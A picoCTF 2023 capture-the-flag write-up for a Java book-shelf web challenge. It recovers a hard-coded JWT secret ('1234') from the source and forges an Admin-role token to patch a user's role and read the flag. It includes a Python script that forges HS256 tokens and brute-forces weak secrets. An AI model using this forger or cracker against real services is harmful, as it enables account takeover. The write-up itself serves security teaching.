# Java Code Analysis!?! #

## Overview ##

300 points

Category: [Web Exploitation](../)

Tags : `#picoCTF 2023` `Web Exploitation`

## Description ##

BookShelf Pico, my premium online book-reading service.
I believe that my website is super secure. I challenge you to prove me wrong by reading the 'Flag' book!

Additional details will be available after launching your challenge instance.

## Solution ##

After the instance starts, picoCTF provides the site's source code and a link to the running instance.

The site has a login screen:

and a main screen with books.

We can't open any of them except the first one.

Let's dive into the code.

A few files are of interest to us.

Inside `JwtService.java` we can see every claim the JWT contains, the issuer, and that the signing key comes from `secretGenerator`.

And inside `SecretGenerator.java` we see this.

So now we know that the "secret key" is `1234`. Since the server signs and verifies tokens with this same key, we have everything needed to decode a token and re-sign a modified one that the server will accept.

But we need a `userId`, so let's get back to the login screen.

Now, I'm using `Google Chrome`: press F12, open the `Network` tab and log in with the credentials picoCTF gives: user `user`, password `user`.

The JWT for our user is returned in the body of the login response:

Copy it and paste it into [jwt.io](https://jwt.io/) to decode it:

So `userId` is `1`.

Now let's encode our own JWT with role `Admin`, signed with the same secret `1234`:

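The forgery step above, as an added example that is not part of the original writeup or the challenge's own code: a standard-library Python script that reads the claims from the login token without checking the signature (what jwt.io's decoder does), re-signs them with role `Admin` under the recovered secret `1234`, and includes the server-side check such a token passes. It also shows the dictionary attack one would run to recover a weak HS256 secret without access to the source, which goes beyond what the writeup needed. The claim names `userId`, `role` and `iss`, the issuer value, the `Free` role and HS256 as the algorithm are assumptions made for this illustration; the user token is constructed locally rather than captured from the instance.

```python
"""Forge an HS256 JWT under a weak, hard-coded secret.

Constructed example using only the standard library; no network access.
Claim names (userId, role, iss), the issuer string, the "Free" role and
HS256 are assumptions for illustration, not taken from the challenge source.
"""
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional

WEAK_SECRET = b"1234"  # the value SecretGenerator hands to JwtService in the challenge


def b64url_encode(data: bytes) -> str:
    """JWT segments are base64url without padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Restore the padding that JWT strips before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_unverified(token: str) -> dict:
    """Read the claims without checking the signature (what jwt.io's decoder shows)."""
    _header_b64, payload_b64, _sig_b64 = token.split(".")
    return json.loads(b64url_decode(payload_b64))


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Build header.payload.signature with HMAC-SHA256 over the first two segments."""
    header = {"alg": "HS256", "typ": "JWT"}
    compact = {"separators": (",", ":")}
    signing_input = (
        b64url_encode(json.dumps(header, **compact).encode())
        + "."
        + b64url_encode(json.dumps(claims, **compact).encode())
    )
    mac = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(mac)


def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Server-side check: pin the algorithm, recompute the MAC, compare in constant time."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
    except ValueError:
        return None
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":  # refuses alg=none and key-confusion tricks
        return None
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


def forge_admin_token(user_token: str, secret: bytes) -> str:
    """Take the token the login endpoint returned and re-issue it with role=Admin."""
    claims = decode_unverified(user_token)
    claims["role"] = "Admin"
    return sign_hs256(claims, secret)


def brute_force_secret(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: the first candidate whose MAC verifies is the secret."""
    for cand in candidates:
        if verify_hs256(token, cand.encode()) is not None:
            return cand
    return None


# Constructed stand-in for the token the login response returns for user:user.
USER_TOKEN = sign_hs256(
    {"role": "Free", "iss": "bookshelf", "userId": 1, "email": "user"}, WEAK_SECRET
)

if __name__ == "__main__":
    print("claims seen by jwt.io:", decode_unverified(USER_TOKEN))
    print("forged token:", forge_admin_token(USER_TOKEN, WEAK_SECRET))
```

`verify_hs256` is what the server effectively does: the secret is the only thing standing between a client and arbitrary claims, so a four-character secret gives every client the power to mint `Admin` tokens. Pinning `alg` in the verifier is shown because the same weak-secret path is often paired with `alg=none` or RS-to-HS confusion in real deployments.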
Inside the `controllers` directory we can find `UserController.java`, where we can see this endpoint:

Now I will use Postman (because I'm lazy) and send some requests with the new JWT to update our role and read the flag.

We need to create a new user on the site, because the default user's role can't be patched.

Then we need the user list to find our new user's id.

First of all, put the forged token into the request headers.

Request:

Our id is `6`.

Now let's patch our role:

Now we are `Admin`: just log in and read the flag: